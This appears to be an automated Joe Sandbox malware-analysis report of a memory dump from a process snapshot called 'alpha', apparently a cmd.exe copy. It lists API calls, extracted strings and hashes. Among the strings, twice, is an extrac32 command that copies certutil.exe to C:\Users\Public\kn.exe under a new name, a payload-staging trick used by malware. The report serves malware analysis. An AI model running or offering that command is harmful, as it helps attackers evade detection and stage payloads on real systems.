                                        • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 3964947564-518410914
                                        • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                        • Instruction ID: 8b88993acd5eeb26be7195c256e3f4d3ef26f4493d50f06a708b12f30c8ee902
                                        • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                        • Instruction Fuzzy Hash: B8026D21B0DA0296EA54BF22A844578F6A6FF957B5FD44135DF2E83294FF3DA600C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$iswspacewcschr
                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                        • API String ID: 840959033-3627297882
                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction ID: 0e766ec1bde537315bd42960f145fc138c41d00b1f24689f8505c9d1c53c77cc
                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction Fuzzy Hash: 2FD15C31B0C64386FA50BF62E8196B8B7A6AF54B64FC44035DF2D46299FE3CE6058730
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                         • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                         • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$EnvironmentVariable
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                        • API String ID: 198002717-267741548
                                        • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                        • Instruction ID: 6ca712a830c395ee3d5a5c0f51ce80ae5eea51f084f41ef420910baae1bf8a45
                                        • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                        • Instruction Fuzzy Hash: 1B516E21B0CA4295FA10AF52A804579FBA6FF59BA1FC4A035DF2E03655FF3CE2048760
                                        APIs
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F000
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F031
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigitiswspacewcschr
                                        • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                        • API String ID: 1595556998-2755026540
                                        • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                        • Instruction ID: 354bc4e792c9bd447599a1b741d76254ca0fbab8bb13d3332a6ac1bb50190e28
                                        • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                        • Instruction Fuzzy Hash: A0225565F0CA5291FA607F16A844279E6E1AF55BF1FC44132DFAD822A4FF3CA6418720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                        • String ID: "$=,;
                                        • API String ID: 3545743878-4143597401
                                        • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                        • Instruction ID: fc56d64ae50a44c2d5fa23fa607e00f73061c4a76622e66976d4501507533fb0
                                        • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                        • Instruction Fuzzy Hash: D9C19161F0EA5286EB656F119800379F6A1FF54FA4F889035CF6E42394FF3CA6458720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentFormatMessageThread
                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                        • API String ID: 2411632146-3173542853
                                        • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                        • Instruction ID: 9cee8bed0fcadf0a480bb2c0b62fd0fbca3389f362eed05dbd3dd1c2668c5b71
                                        • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                        • Instruction Fuzzy Hash: 18614661B0DA8291EA64EF91A5045B9F3A4FB54BA4FC4413ADF6D07758EF3CE7408B20
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateFile_open_osfhandle
                                        • String ID: con
                                        • API String ID: 2905481843-4257191772
                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                        • Instruction ID: e45d3f9585955b137129732b92fec5b6c2eceea061c332b5446ba5eb126e827e
                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                        • Instruction Fuzzy Hash: C671B432B0C6819AE720AF16E444A79FAA5FB89B70FD44234DF6D42794EF3CD6458B10
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                        • String ID:
                                        • API String ID: 3829876242-3916222277
                                        • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                        • Instruction ID: 1e7b660d3dbc616b854d2d65d01054ca7051dbde0fe638e5f95fad3522282fcc
                                        • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                        • Instruction Fuzzy Hash: 40617226B0CA4296E614AF52D41417AF7A1FF89B64FC89134DF5E07794EF3CEA058710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                        • String ID: CSVFS$NTFS$REFS
                                        • API String ID: 3510147486-2605508654
                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                        • Instruction ID: 1c22528e862d587adf3acb1f355e0125976161ad6b1ffcb9e14f0c77530023f2
                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                        • Instruction Fuzzy Hash: A9613832708B829AEB619F61D8443E9B7A5FB5AB94F844036DF1E4B758EF38D604C710
                                        APIs
                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7CD487279,?,?,?,?,?,00007FF7CD48BFA9), ref: 00007FF7CD4A4485
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: longjmp
                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                        • API String ID: 1832741078-366822981
                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                        • Instruction ID: b6669f0f639bd16b9f4470d5b703d6d1191d4d1d6d9add8318ee690f68694a1c
                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                        • Instruction Fuzzy Hash: B6C1D124F0C68281EA24FF9655906BCE791AB56BE4FD4003ACF2D97691EF2CE745C321
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • memset.MSVCRT ref: 00007FF7CD48BA2B
                                        • wcschr.MSVCRT ref: 00007FF7CD48BA8A
                                        • wcschr.MSVCRT ref: 00007FF7CD48BAAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heapwcschr$AllocProcessmemset
                                        • String ID: -$:.\$=,;$=,;+/[] "
                                        • API String ID: 2872855111-969133440
                                        • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                        • Instruction ID: 40ead6ffab11eb7b031e22e9e56a2ec774a09762bc7c0de87b4ad7f822bc0596
                                        • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                        • Instruction Fuzzy Hash: C1B1B421B0DA8285EA70AF55984427AA6A1FF44BE0FC54135CF7E83794EF3CE645C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                        • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 1606811317-2340392073
                                        • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                        • Instruction ID: dcfd9f8024bce1514ae232796501f5097e032946bcc1ae3888e412b6a9a3ca47
                                        • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                        • Instruction Fuzzy Hash: CAD16D21B0DA4281EA50AF15A8445B9B7A1FF857B0FC44132DF6E477A5EF3CE645C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$ErrorLast$InformationVolume
                                        • String ID: %04X-%04X$~
                                        • API String ID: 2748242238-2468825380
                                        • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                        • Instruction ID: 14fa2c6366c8a8764555a05ede95c31b75337f28fcd03d372677530ed0aa5a8f
                                        • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                        • Instruction Fuzzy Hash: 71A1B12270CBC19AEB25AF6198402E9B7A5FB857A5F848134DF5D4BB88EF3CD7058710
                                        APIs
                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD496677
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD49668F
                                        • _errno.MSVCRT ref: 00007FF7CD4966A3
                                        • wcstol.MSVCRT ref: 00007FF7CD4966C4
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966E4
                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                        • API String ID: 2348642995-441775793
                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                        • Instruction ID: 74709389e48ee26bd2dc1a6278de5a0464d34172f47dfc48489da7e0b6f9f190
                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                        • Instruction Fuzzy Hash: 0D718362A0CA4685EB606F22D41097DF7A6EB45B64F94C031EF6E02294FF3CE684C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                        • String ID: FAT$~
                                        • API String ID: 2238823677-1832570214
                                        • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                        • Instruction ID: da0723e70dfad8aa1c754b2df9299d3122dbc3ef6b5181c8ca2fe4148b7238f2
                                        • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                        • Instruction Fuzzy Hash: 86718C3270CBC18AEB21AF2198446E9B7A5FB857A8F848035DF5D4BB58EF38D645C710
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D884
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D89D
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D94D
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D964
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD48DB89
                                        • wcstol.MSVCRT ref: 00007FF7CD48DBDF
                                        • wcstol.MSVCRT ref: 00007FF7CD48DC63
                                        • memmove.MSVCRT ref: 00007FF7CD48DD33
                                        • memmove.MSVCRT ref: 00007FF7CD48DE9A
                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48DF1F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                        • String ID:
                                        • API String ID: 1051989028-0
